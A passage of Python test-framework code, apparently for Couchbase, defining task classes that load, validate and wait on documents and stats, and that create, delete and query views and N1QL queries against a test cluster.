self.doc_type = self.generator.doc_type
self.op_type = op_type
self.sdk_retry_strategy = sdk_retry_strategy
self.itr_count = 0
self.__stop_updates = False
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.scope = scope
self.collection = collection
def end_task(self):
self.__stop_updates = True
def _start_doc_ops(self, bucket):
self.test_log.info("Performing doc ops '%s' on %s" % (self.op_type,
bucket.name))
while not self.__stop_updates:
self.itr_count += 1
doc_gens = list()
doc_tasks = list()
task_instance = 1
for _ in self.clients:
doc_gens.append(copy.deepcopy(self.generator))
for index, generator in enumerate(doc_gens):
batch_gen = BatchedDocumentGenerator(generator,
self.batch_size)
task = LoadDocumentsTask(
self.cluster, bucket, self.clients[index],
batch_gen, self.op_type, self.exp,
task_identifier="%s_%s" % (self.thread_name,
task_instance),
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
scope=self.scope,
collection=self.collection,
sdk_client_pool=self.sdk_client_pool,
skip_read_success_results=True,
sdk_retry_strategy=self.sdk_retry_strategy)
self.task_manager.add_new_task(task)
doc_tasks.append(task)
                task_instance += 1
            for task in doc_tasks:
                self.task_manager.get_task_result(task)
                # Collect failures only after the task has finished running
                self.fail.update(task.fail)
self.test_log.info("Closing SDK clients..")
for client in self.clients:
if client is not None:
client.close()
self.test_log.info("Done doc_ops on %s. Total iterations: %d"
% (bucket.name, self.itr_count))
def call(self):
self.start_task()
if self.buckets:
for bucket in self.buckets:
self._start_doc_ops(bucket)
else:
self._start_doc_ops(self.bucket)
self.complete_task()
class LoadDocumentsForDgmTask(LoadDocumentsGeneratorsTask):
def __init__(self, cluster, task_manager, bucket, clients, doc_gen, exp,
batch_size=50,
persist_to=0, replicate_to=0,
durability="",
timeout_secs=5,
process_concurrency=4, print_ops_rate=True,
active_resident_threshold=99,
dgm_batch=5000,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
skip_read_on_error=False,
suppress_error_table=False,
track_failures=True,
task_identifier="",
sdk_client_pool=None,
sdk_retry_strategy=None):
super(LoadDocumentsForDgmTask, self).__init__(
            cluster, task_manager, bucket, clients, None,
"create", exp,
task_identifier="DGM_%s_%s_%s_%s" % (bucket.name, scope,
collection, time.time()))
self.cluster = cluster
self.exp = exp
self.doc_gen = doc_gen
self.persist_to = persist_to
self.replicate_to = replicate_to
self.durability = durability
self.timeout_secs = timeout_secs
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.active_resident_threshold = active_resident_threshold
self.dgm_batch = dgm_batch
self.task_identifier = task_identifier
self.skip_read_on_error = skip_read_on_error
self.suppress_error_table = suppress_error_table
self.track_failures = track_failures
self.op_type = "create"
self.rest_client = BucketHelper(self.cluster.master)
self.doc_index = self.doc_gen.start
self.docs_loaded_per_bucket = dict()
if isinstance(bucket, list):
self.buckets = bucket
else:
self.buckets = [bucket]
self.scope = scope
self.collection = collection
self.sdk_client_pool = sdk_client_pool
self.sdk_retry_strategy = sdk_retry_strategy
def _get_bucket_dgm(self, bucket):
"""
Returns a tuple of (active_rr, replica_rr)
"""
try:
active_resident_items_ratio = self.rest_client.fetch_bucket_stats(
bucket.name)["op"]["samples"][
"vb_active_resident_items_ratio"][-1]
replica_resident_items_ratio = self.rest_client.fetch_bucket_stats(
bucket.name)["op"]["samples"][
"vb_replica_resident_items_ratio"][-1]
except KeyError:
active_resident_items_ratio = replica_resident_items_ratio = 100
return active_resident_items_ratio, replica_resident_items_ratio
def _load_next_batch_of_docs(self, bucket):
doc_gens = [deepcopy(self.doc_gen)
for _ in range(self.process_concurrency)]
doc_tasks = list()
self.test_log.debug("Doc load from index %d" % self.doc_index)
for index in range(self.process_concurrency):
doc_gens[index].start = self.doc_index
doc_gens[index].itr = self.doc_index
doc_gens[index].end = self.doc_index + self.dgm_batch
self.doc_index += self.dgm_batch
self.docs_loaded_per_bucket[bucket] += self.dgm_batch
# Start doc_loading tasks
for index, doc_gen in enumerate(doc_gens):
batch_gen = BatchedDocumentGenerator(doc_gen, self.batch_size)
task = LoadDocumentsTask(
self.cluster, bucket, self.clients[index], batch_gen,
"create", self.exp,
scope=self.scope,
collection=self.collection,
task_identifier=self.thread_name,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
timeout_secs=self.timeout_secs,
skip_read_on_error=self.skip_read_on_error,
suppress_error_table=self.suppress_error_table,
track_failures=self.track_failures,
sdk_client_pool=self.sdk_client_pool,
sdk_retry_strategy=self.sdk_retry_strategy)
self.task_manager.add_new_task(task)
doc_tasks.append(task)
# Wait for doc_loading tasks to complete
for task in doc_tasks:
self.task_manager.get_task_result(task)
def _load_bucket_into_dgm(self, bucket):
"""
Load bucket into dgm until either active_rr or replica_rr
goes below self.active_resident_threshold
"""
active_dgm_value, replica_dgm_value = self._get_bucket_dgm(bucket)
self.test_log.info("DGM doc loading for '%s' to atleast %s%%"
% (bucket.name, self.active_resident_threshold))
while active_dgm_value > self.active_resident_threshold and \
replica_dgm_value > self.active_resident_threshold:
self.test_log.info("Active_resident_items_ratio for {0} is {1}"
.format(bucket.name, active_dgm_value))
self.test_log.info("Replica_resident_items_ratio for {0} is {1}"
.format(bucket.name, replica_dgm_value))
self._load_next_batch_of_docs(bucket)
active_dgm_value, replica_dgm_value = self._get_bucket_dgm(bucket)
self.test_log.info(
"Active DGM %s%% Replica DGM %s%% achieved for '%s'. Loaded docs: %s"
% (active_dgm_value, replica_dgm_value, bucket.name,
self.docs_loaded_per_bucket[bucket]))
def call(self):
self.test_log.info("Starting DGM doc loading task")
self.start_task()
for bucket in self.buckets:
self.docs_loaded_per_bucket[bucket] = 0
self._load_bucket_into_dgm(bucket)
collection = bucket.scopes[self.scope].collections[self.collection]
collection.num_items += self.docs_loaded_per_bucket[bucket]
collection.doc_index = (collection.doc_index[0],
collection.doc_index[1] +
self.docs_loaded_per_bucket[bucket])
# Close all SDK clients
if self.sdk_client_pool is None:
for client in self.clients:
client.close()
self.complete_task()
self.test_log.info("Done loading docs for DGM")
class ValidateDocumentsTask(GenericLoadingTask):
def __init__(self, cluster, bucket, client, generator, op_type, exp,
flag=0, proxy_client=None, batch_size=1,
timeout_secs=30, time_unit="seconds",
compression=None, check_replica=False,
sdk_client_pool=None,
sdk_retry_strategy=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
is_sub_doc=False,
suppress_error_table=False):
super(ValidateDocumentsTask, self).__init__(
cluster, bucket, client, batch_size=batch_size,
timeout_secs=timeout_secs,
time_unit=time_unit,
compression=compression,
sdk_client_pool=sdk_client_pool,
sdk_retry_strategy=sdk_retry_strategy,
scope=scope, collection=collection)
self.thread_name = "ValidateDocumentsTask-%s_%s_%s_%s_%s_%s_%s" % (
bucket.name,
self.scope,
self.collection,
generator._doc_gen.start,
generator._doc_gen.end,
op_type, time.time())
self.generator = generator
self.skip_doc_gen_value = False
self.op_type = op_type
if self.op_type in [DocLoading.Bucket.DocOps.DELETE]:
self.skip_doc_gen_value = True
self.exp = exp
self.flag = flag
self.suppress_error_table = suppress_error_table
if not self.suppress_error_table:
self.failed_item_table = TableView(self.test_log.info)
self.failed_item_table.set_headers(["READ Key", "Exception"])
self.missing_keys = []
self.wrong_values = []
self.failed_reads = dict()
        self.check_replica = check_replica
        self.replicas = bucket.replicaNumber
        self.client = client
        if proxy_client:
            # Use the proxy connection in place of the regular client
            self.log.debug("Changing client to proxy %s:%s..."
                           % (proxy_client.host, proxy_client.port))
            self.client = proxy_client
self.is_sub_doc = is_sub_doc
def has_next(self):
return self.generator.has_next()
def __validate_sub_docs(self, doc_gen):
if self.sdk_client_pool is not None:
self.client = \
self.sdk_client_pool.get_client_for_bucket(self.bucket,
self.scope,
self.collection)
key_value = dict(doc_gen.next_batch(self.skip_doc_gen_value))
self.test_log.info(key_value)
result_map, self.failed_reads = self.batch_read(key_value.keys())
self.test_log.info(result_map)
self.test_log.info(self.failed_reads)
if self.sdk_client_pool:
self.sdk_client_pool.release_client(self.client)
self.client = None
return
op_failed_tbl = TableView(self.log.error)
op_failed_tbl.set_headers(["Update Key",
"Value"])
for key, value in task.success.items():
doc_value = value["value"]
failed_row = [key, doc_value]
if doc_value[0] != 0:
op_failed_tbl.add_row(failed_row)
elif doc_value[1] != "LastNameUpdate":
op_failed_tbl.add_row(failed_row)
elif doc_value[2] != "TypeChange":
op_failed_tbl.add_row(failed_row)
elif doc_value[3] != "CityUpdate":
op_failed_tbl.add_row(failed_row)
elif Json.loads(str(doc_value[4])) \
!= ["get", "up"]:
op_failed_tbl.add_row(failed_row)
op_failed_tbl.display("Keys failed in %s:%s:%s"
% (self.bucket.name,
self.scope,
self.collection))
if len(op_failed_tbl.rows) != 0:
self.fail("Update failed for few keys")
op_failed_tbl = TableView(self.log.error)
op_failed_tbl.set_headers(["Delete Key",
"Value"])
for key, value in task.success.items():
doc_value = value["value"]
failed_row = [key, doc_value]
if doc_value[0] != 2:
op_failed_tbl.add_row(failed_row)
for index in range(1, len(doc_value)):
if doc_value[index] != "PATH_NOT_FOUND":
op_failed_tbl.add_row(failed_row)
for key, value in task.fail.items():
op_failed_tbl.add_row([key, value["value"]])
op_failed_tbl.display("Keys failed in %s:%s:%s"
% (self.bucket.name,
self.scope,
self.collection))
if len(op_failed_tbl.rows) != 0:
self.fail("Delete failed for few keys")
def __validate_docs(self, doc_gen):
if self.sdk_client_pool is not None:
self.client = \
self.sdk_client_pool.get_client_for_bucket(self.bucket,
self.scope,
self.collection)
key_value = dict(doc_gen.next_batch(self.skip_doc_gen_value))
if self.check_replica:
# change to getFromReplica
result_map = dict()
self.failed_reads = dict()
for key in key_value.keys():
try:
result = self.client.get_from_all_replicas(key)
if all(_result for _result in result) \
and len(result) == min(self.replicas + 1,
len(
self.cluster.nodes_in_cluster)):
key = key.decode()
if result[0]["status"]:
result_map[key] = dict()
result_map[key]["value"] = result[0]["value"]
result_map[key]["cas"] = result[0]["cas"]
elif result:
self.failed_reads[key] = dict()
self.failed_reads[key]["cas"] = result[0]["cas"]
self.failed_reads[key]["error"] = result
self.failed_reads[key]["value"] = dict()
else:
self.failed_reads[key] = dict()
self.failed_reads[key]["cas"] = 0
self.failed_reads[key]["error"] = \
SDKException.DocumentNotFoundException
self.failed_reads[key]["value"] = dict()
except Exception as error:
self.exception = error
return
else:
result_map, self.failed_reads = self.batch_read(key_value.keys())
if self.sdk_client_pool:
self.sdk_client_pool.release_client(self.client)
self.client = None
if not self.suppress_error_table:
for key, value in self.failed_reads.items():
if SDKException.DocumentNotFoundException \
not in str(self.failed_reads[key]["error"]):
self.failed_item_table.add_row([key, value['error']])
missing_keys, wrong_values = self.validate_key_val(result_map,
key_value)
if self.op_type == 'delete':
not_missing = []
if missing_keys.__len__() != key_value.keys().__len__():
for key in key_value.keys():
if key not in missing_keys:
not_missing.append(key)
if not_missing:
self.exception = Exception("Keys were not deleted. "
"Keys not deleted: {}"
.format(','.join(not_missing)))
else:
if missing_keys:
self.exception = Exception("Total %d keys missing: %s"
% (missing_keys.__len__(),
missing_keys))
self.missing_keys.extend(missing_keys)
if wrong_values:
self.exception = Exception("Total %s wrong key-values :: %s"
% (wrong_values.__len__(),
wrong_values))
self.wrong_values.extend(wrong_values)
if self.exception:
raise(self.exception)
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
if self.is_sub_doc:
self.__validate_sub_docs(doc_gen)
else:
self.__validate_docs(doc_gen)
def validate_key_val(self, map, key_value):
missing_keys = []
wrong_values = []
for key, value in key_value.items():
if key in map:
if type(value) == JsonObject:
expected_val = Json.loads(value.toString())
else:
expected_val = Json.loads(value)
if map[key]['cas'] != 0:
actual_val = Json.loads(map[key][
'value'].toString())
elif map[key]['error'] is not None:
actual_val = map[key]['error'].toString()
else:
missing_keys.append(key)
continue
actual_val["mutated"] = int(actual_val["mutated"])
expected_val["mutated"] = int(expected_val["mutated"])
if expected_val == actual_val:
continue
else:
wrong_value = "Key: {} Expected: {} Actual: {}" \
.format(key, expected_val, actual_val)
wrong_values.append(wrong_value)
elif SDKException.DocumentNotFoundException \
in str(self.failed_reads[key]["error"]):
missing_keys.append(key)
return missing_keys, wrong_values
class DocumentsValidatorTask(Task):
def __init__(self, cluster, task_manager, bucket, clients, generators,
op_type, exp, flag=0, batch_size=1,
timeout_secs=60, time_unit="seconds",
compression=None,
process_concurrency=4, check_replica=False,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
sdk_client_pool=None,
sdk_retry_strategy=None,
is_sub_doc=False,
suppress_error_table=False):
super(DocumentsValidatorTask, self).__init__(
"DocumentsValidatorTask_%s_%s_%s" % (
bucket.name, op_type, time.time()))
self.cluster = cluster
self.exp = exp
self.flag = flag
self.timeout_secs = timeout_secs
self.time_unit = time_unit
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.sdk_client_pool = sdk_client_pool
self.sdk_retry_strategy = sdk_retry_strategy
self.task_manager = task_manager
self.batch_size = batch_size
self.generators = generators
self.input_generators = generators
self.op_types = None
self.buckets = None
self.suppress_error_table = suppress_error_table
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.scope = scope
self.collection = collection
self.check_replica = check_replica
self.is_sub_doc = is_sub_doc
def call(self):
self.start_task()
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception("Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = []
exception = None
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
self.task_manager.get_task_result(task)
if not self.suppress_error_table:
task.failed_item_table.display(
"DocValidator failure for %s:%s:%s"
% (self.bucket.name, self.scope, self.collection))
except Exception as e:
self.result = False
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in tasks:
self.task_manager.stop_task(task)
self.log.debug("Task '%s' complete." % (task.thread_name))
self.test_log.error(e)
if not self.sdk_client_pool:
for client in self.clients:
client.close()
self.set_exception(e)
self.complete_task()
if not self.sdk_client_pool:
for client in self.clients:
client.close()
self.complete_task()
if exception:
self.set_exception(exception)
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(
int((generator.end - generator.start) / self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = ValidateDocumentsTask(
self.cluster, self.bucket, self.clients[i], generators[i],
self.op_type, self.exp, self.flag, batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
time_unit=self.time_unit,
compression=self.compression, check_replica=self.check_replica,
scope=self.scope, collection=self.collection,
sdk_client_pool=self.sdk_client_pool,
sdk_retry_strategy=self.sdk_retry_strategy,
is_sub_doc=self.is_sub_doc,
suppress_error_table=self.suppress_error_table)
tasks.append(task)
return tasks
class StatsWaitTask(Task):
EQUAL = '=='
NOT_EQUAL = '!='
LESS_THAN = '<'
LESS_THAN_EQ = '<='
GREATER_THAN = '>'
GREATER_THAN_EQ = '>='
def __init__(self, shell_conn_list, bucket, stat_cmd, stat, comparison,
value, timeout=300):
super(StatsWaitTask, self).__init__("StatsWaitTask_%s_%s_%s"
% (bucket.name,
stat,
str(time.time())))
self.shellConnList = shell_conn_list
self.bucket = bucket
self.statCmd = stat_cmd
self.stat = stat
self.comparison = comparison
self.value = value
self.stop = False
self.timeout = timeout
self.cbstatObjList = list()
def call(self):
self.start_task()
start_time = time.time()
timeout = start_time + self.timeout
for remote_conn in self.shellConnList:
self.cbstatObjList.append(Cbstats(remote_conn))
try:
while not self.stop and time.time() < timeout:
if self.statCmd in ["all", "dcp"]:
self._get_all_stats_and_compare()
elif self.statCmd == "checkpoint":
if self.bucket.bucketType != Bucket.Type.MEMBASE:
self.stop = True
break
self._get_checkpoint_stats_and_compare()
else:
raise Exception("Not supported. Implement the stat call")
finally:
pass
if time.time() > timeout:
for shell in self.shellConnList:
shell.disconnect()
self.set_exception("Could not verify stat {} within timeout {}"
.format(self.stat, self.timeout))
self.complete_task()
def _get_all_stats_and_compare(self):
stat_result = 0
val_dict = dict()
retry = 10
while retry > 0:
try:
for cb_stat_obj in self.cbstatObjList:
tem_stat = cb_stat_obj.all_stats(self.bucket.name,
stat_name=self.statCmd)
                    if self.stat in tem_stat:
                        val_dict[cb_stat_obj.shellConn.ip] = \
                            tem_stat[self.stat]
                        stat_result += int(tem_stat[self.stat])
break
except Exception as error:
if retry > 0:
retry -= 1
sleep(5, "MC is down. Retrying.. %s" % str(error))
continue
for shell in self.shellConnList:
shell.disconnect()
self.set_exception(error)
self.stop = True
if not self._compare(self.comparison, str(stat_result), self.value):
self.log.debug("Not Ready: %s %s %s %s. "
"Received: %s for bucket '%s'"
% (self.stat, stat_result, self.comparison,
self.value, val_dict, self.bucket.name))
self.log.debug("Wait before next StatWaitTask check")
sleep(5, log_type="infra")
else:
self.test_log.debug("Ready: %s %s %s %s. "
"Received: %s for bucket '%s'"
% (self.stat, stat_result, self.comparison,
self.value, val_dict, self.bucket.name))
self.stop = True
def _get_checkpoint_stats_and_compare(self):
stat_result = 0
val_dict = dict()
retry = 5
while retry > 0:
try:
for cb_stat_obj in self.cbstatObjList:
tem_stat = cb_stat_obj.checkpoint_stats(self.bucket.name)
node_stat_val = 0
for vb in tem_stat:
node_stat_val += tem_stat[vb][self.stat]
val_dict[cb_stat_obj.shellConn.ip] = node_stat_val
stat_result += node_stat_val
break
except Exception as error:
if retry > 0:
retry -= 1
sleep(5, "MC is down. Retrying.. %s" % str(error))
continue
for shell in self.shellConnList:
shell.disconnect()
self.set_exception(error)
self.stop = True
if not self._compare(self.comparison, str(stat_result), self.value):
self.test_log.debug("Not Ready: %s %s %s %s. "
"Received: %s for bucket '%s'"
% (self.stat, stat_result, self.comparison,
self.value, val_dict, self.bucket.name))
self.log.debug("Wait before next StatWaitTask check")
sleep(5, log_type="infra")
else:
self.test_log.debug("Ready: %s %s %s %s. "
"Received: %s for bucket '%s'"
% (self.stat, stat_result, self.comparison,
self.value, val_dict, self.bucket.name))
self.stop = True
def _compare(self, cmp_type, a, b):
if isinstance(b, (int, long)) and a.isdigit():
a = long(a)
elif isinstance(b, (int, long)) and not a.isdigit():
return False
self.test_log.debug("Comparing %s %s %s" % (a, cmp_type, b))
if (cmp_type == StatsWaitTask.EQUAL and a == b) or \
(cmp_type == StatsWaitTask.NOT_EQUAL and a != b) or \
(cmp_type == StatsWaitTask.LESS_THAN_EQ and a <= b) or \
(cmp_type == StatsWaitTask.GREATER_THAN_EQ and a >= b) or \
(cmp_type == StatsWaitTask.LESS_THAN and a < b) or \
(cmp_type == StatsWaitTask.GREATER_THAN and a > b):
return True
return False
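# Example use of StatsWaitTask (hypothetical values): block until the
# "curr_items" stat, summed across the given shell connections, reaches
# at least 10000 for the bucket, or the default 300s timeout expires.
#
#   wait_task = StatsWaitTask(shell_conn_list, bucket, "all", "curr_items",
#                             StatsWaitTask.GREATER_THAN_EQ, 10000)
#   task_manager.add_new_task(wait_task)
#   task_manager.get_task_result(wait_task)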
class ViewCreateTask(Task):
def __init__(self, server, design_doc_name, view,
bucket="default", with_query=True,
check_replication=False, ddoc_options=None):
super(ViewCreateTask, self).__init__("ViewCreateTask_%s_%s_%s"
% (bucket, view, time.time()))
self.server = server
self.bucket = bucket
self.view = view
prefix = ""
if self.view:
prefix = ("", "dev_")[self.view.dev_view]
if design_doc_name.find('/') != -1:
design_doc_name = design_doc_name.replace('/', '%2f')
self.design_doc_name = prefix + design_doc_name
self.ddoc_rev_no = 0
self.with_query = with_query
self.check_replication = check_replication
self.ddoc_options = ddoc_options
self.rest = RestConnection(self.server)
def call(self):
self.start_task()
try:
# appending view to existing design doc
content, meta = self.rest.get_ddoc(self.bucket,
self.design_doc_name)
ddoc = DesignDocument._init_from_json(self.design_doc_name,
content)
# if view is to be updated
if self.view:
if self.view.is_spatial:
ddoc.add_spatial_view(self.view)
else:
ddoc.add_view(self.view)
self.ddoc_rev_no = self._parse_revision(meta['rev'])
except ReadDocumentException:
# creating first view in design doc
if self.view:
if self.view.is_spatial:
ddoc = DesignDocument(self.design_doc_name, [],
spatial_views=[self.view])
else:
ddoc = DesignDocument(self.design_doc_name, [self.view])
# create an empty design doc
else:
ddoc = DesignDocument(self.design_doc_name, [])
if self.ddoc_options:
ddoc.options = self.ddoc_options
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
self.complete_task()
return 0
try:
self.rest.create_design_document(self.bucket, ddoc)
return_value = self.check()
self.complete_task()
return return_value
except DesignDocCreationException as e:
self.set_exception(e)
self.complete_task()
return 0
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
self.complete_task()
return 0
def check(self):
try:
# only query if the DDoc has a view
if self.view:
if self.with_query:
query = {"stale": "ok"}
if self.view.is_spatial:
content = self.rest.query_view(
self.design_doc_name, self.view.name,
self.bucket, query, type="spatial")
else:
content = self.rest.query_view(
self.design_doc_name, self.view.name,
self.bucket, query)
else:
_, json_parsed, _ = self.rest._get_design_doc(
self.bucket, self.design_doc_name)
if self.view.is_spatial:
if self.view.name not in json_parsed["spatial"].keys():
self.set_exception(
Exception(
"design doc {0} doesn't contain spatial view {1}"
.format(self.design_doc_name,
self.view.name)))
return 0
else:
if self.view.name not in json_parsed["views"].keys():
self.set_exception(Exception(
"design doc {0} doesn't contain view {1}"
.format(self.design_doc_name,
self.view.name)))
return 0
self.test_log.debug(
"View: {0} was created successfully in ddoc: {1}"
.format(self.view.name, self.design_doc_name))
else:
# If we are here, it means design doc was successfully updated
self.test_log.debug("Design Doc: {0} was updated successfully"
.format(self.design_doc_name))
if self._check_ddoc_revision():
return self.ddoc_rev_no
else:
self.set_exception(Exception("failed to update design doc"))
if self.check_replication:
self._check_ddoc_replication_on_nodes()
except QueryViewException as e:
            if e.message.find('not_found') > -1 \
                    or e.message.find('view_undefined') > -1:
self.check()
else:
self.set_exception(e)
return 0
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
return 0
def _check_ddoc_revision(self):
valid = False
try:
content, meta = self.rest.get_ddoc(self.bucket,
self.design_doc_name)
new_rev_id = self._parse_revision(meta['rev'])
if new_rev_id != self.ddoc_rev_no:
self.ddoc_rev_no = new_rev_id
valid = True
except ReadDocumentException:
pass
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
return False
return valid
def _parse_revision(self, rev_string):
return int(rev_string.split('-')[0])
def _check_ddoc_replication_on_nodes(self):
nodes = self.rest.node_statuses()
retry_count = 3
# nothing to check if there is only 1 node
if len(nodes) <= 1:
return
for node in nodes:
server_info = {"ip": node.ip,
"port": node.port,
"username": self.rest.username,
"password": self.rest.password}
for count in xrange(retry_count):
try:
rest_node = RestConnection(server_info)
content, meta = rest_node.get_ddoc(self.bucket,
self.design_doc_name)
new_rev_id = self._parse_revision(meta['rev'])
if new_rev_id == self.ddoc_rev_no:
break
else:
self.test_log.debug(
"Design Doc {0} version is not updated on node {1}:{2}. Retrying."
.format(self.design_doc_name,
node.ip, node.port))
sleep(2)
except ReadDocumentException as e:
if count < retry_count:
self.test_log.debug(
"Design Doc {0} not yet available on node {1}:{2}. Retrying."
.format(self.design_doc_name,
node.ip, node.port))
sleep(2)
else:
self.test_log.error(
"Design Doc {0} failed to replicate on node {1}:{2}"
.format(self.design_doc_name, node.ip,
node.port))
self.set_exception(e)
break
except Exception as e:
if count < retry_count:
self.test_log.error("Unexpected exception: %s. "
"Will retry after sleep.." % e)
sleep(2)
else:
self.set_exception(e)
break
else:
self.set_exception(Exception(
"Design Doc {0} version mismatch on node {1}:{2}"
.format(self.design_doc_name, node.ip, node.port)))
class ViewDeleteTask(Task):
def __init__(self, server, design_doc_name, view, bucket="default"):
Task.__init__(self, "Delete_view_task_%s_%s_%s"
% (bucket, view, time.time()))
self.server = server
self.bucket = bucket
self.view = view
prefix = ""
if self.view:
prefix = ("", "dev_")[self.view.dev_view]
self.design_doc_name = prefix + design_doc_name
def call(self):
self.start_task()
try:
rest = RestConnection(self.server)
if self.view:
# remove view from existing design doc
content, header = rest.get_ddoc(self.bucket,
self.design_doc_name)
ddoc = DesignDocument._init_from_json(self.design_doc_name,
content)
if self.view.is_spatial:
status = ddoc.delete_spatial(self.view)
else:
status = ddoc.delete_view(self.view)
if not status:
self.set_exception(Exception('View does not exist! %s'
% (self.view.name)))
self.complete_task()
return False
# update design doc
rest.create_design_document(self.bucket, ddoc)
return_value = self.check()
self.complete_task()
return return_value
else:
# delete the design doc
rest.delete_view(self.bucket, self.design_doc_name)
self.test_log.debug("Design Doc : {0} was successfully deleted"
.format(self.design_doc_name))
self.complete_task()
return True
except (ValueError, ReadDocumentException,
DesignDocCreationException) as e:
self.set_exception(e)
self.complete_task()
return False
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
self.complete_task()
return False
def check(self):
try:
rest = RestConnection(self.server)
# make sure view was deleted
query = {"stale": "ok"}
content = rest.query_view(self.design_doc_name, self.view.name,
self.bucket, query)
return False
except QueryViewException as e:
self.test_log.debug(
"View: {0} was successfully deleted in ddoc: {1}"
.format(self.view.name, self.design_doc_name))
return True
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
return False
class ViewQueryTask(Task):
def __init__(self, server, design_doc_name, view_name,
query, expected_rows=None,
bucket="default", retry_time=2):
Task.__init__(self, "Query_view_task_%s_%s_%s"
% (bucket, design_doc_name, view_name))
self.server = server
self.bucket = bucket
self.view_name = view_name
self.design_doc_name = design_doc_name
self.query = query
self.expected_rows = expected_rows
self.retry_time = retry_time
self.timeout = 900
def call(self):
self.start_task()
retries = 0
while retries < self.retry_time:
try:
rest = RestConnection(self.server)
# make sure view can be queried
content = \
rest.query_view(self.design_doc_name, self.view_name,
self.bucket, self.query, self.timeout)
if self.expected_rows is None:
# no verification
self.result = True
self.complete_task()
return content
else:
return_value = self.check()
self.result = return_value
self.complete_task()
return return_value
except QueryViewException as e:
self.test_log.debug("Initial query failed. "
"Will retry after sleep..")
sleep(self.retry_time)
retries += 1
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
self.complete_task()
self.result = True
return False
def check(self):
try:
rest = RestConnection(self.server)
# query and verify expected num of rows returned
content = \
rest.query_view(self.design_doc_name, self.view_name,
self.bucket, self.query, self.timeout)
self.test_log.debug(
"Server: %s, Design Doc: %s, View: %s, (%d rows) expected, (%d rows) returned"
% (self.server.ip, self.design_doc_name,
self.view_name, self.expected_rows,
len(content['rows'])))
raised_error = content.get(u'error', '') or \
''.join([str(item) for item in
content.get(u'errors', [])])
if raised_error:
raise QueryViewException(self.view_name, raised_error)
if len(content['rows']) == self.expected_rows:
self.test_log.debug(
"Expected rows: '{0}' was found for view query"
.format(self.expected_rows))
return True
else:
if len(content['rows']) > self.expected_rows:
raise QueryViewException(self.view_name,
"Server: {0}, Design Doc: {1}, actual returned rows: '{2}' are greater than expected {3}"
.format(self.server.ip,
self.design_doc_name,
len(content['rows']),
self.expected_rows, ))
if "stale" in self.query:
if self.query["stale"].lower() == "false":
return False
self.test_log.debug("Retry until expected results "
"or task times out")
sleep(self.retry_time)
self.check()
except QueryViewException as e:
# subsequent query failed! exit
self.set_exception(e)
return False
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
return False
class N1QLQueryTask(Task):
def __init__(self, server, bucket, query, n1ql_helper=None,
expected_result=None, verify_results=True,
is_explain_query=False, index_name=None, retry_time=2,
scan_consistency=None, scan_vector=None, timeout=900):
super(N1QLQueryTask, self).__init__("query_n1ql_task_%s_%s_%s"
% (bucket, query, time.time()))
self.server = server
self.bucket = bucket
self.query = query
self.expected_result = expected_result
self.n1ql_helper = n1ql_helper
self.timeout = timeout
self.verify_results = verify_results
self.is_explain_query = is_explain_query
self.index_name = index_name
        self.retry_time = retry_time
self.retried = 0
self.scan_consistency = scan_consistency
self.scan_vector = scan_vector
def call(self):
self.start_task()
try:
# Query and get results
self.test_log.debug(" <<<<< START Executing Query {0} >>>>>>"
.format(self.query))
if not self.is_explain_query:
self.msg, self.isSuccess = self.n1ql_helper.run_query_and_verify_result(
query=self.query, server=self.server,
expected_result=self.expected_result,
scan_consistency=self.scan_consistency,
scan_vector=self.scan_vector,
verify_results=self.verify_results)
else:
self.actual_result = self.n1ql_helper.run_cbq_query(
query=self.query, server=self.server)
self.test_log.debug(self.actual_result)
self.test_log.debug(" <<<<< Done Executing Query {0} >>>>>>"
.format(self.query))
return_value = self.check()
self.complete_task()
return return_value
except N1QLQueryException:
self.test_log.debug("Initial query failed, will retry..")
if self.retried < self.retry_time:
self.retried += 1
sleep(self.retry_time)
self.call()
# catch and set all unexpected exceptions
except Exception as e:
self.complete_task()
self.set_exception(e)
def check(self):
try:
# Verify correctness of result set
if self.verify_results:
if not self.is_explain_query:
if not self.isSuccess:
self.test_log.debug("Incorrect query results for %s"
% self.query)
raise N1QLQueryException(self.msg)
else:
check = self.n1ql_helper.verify_index_with_explain(
self.actual_result, self.index_name)
if not check:
actual_result = self.n1ql_helper.run_cbq_query(
query="select * from system:indexes",
server=self.server)
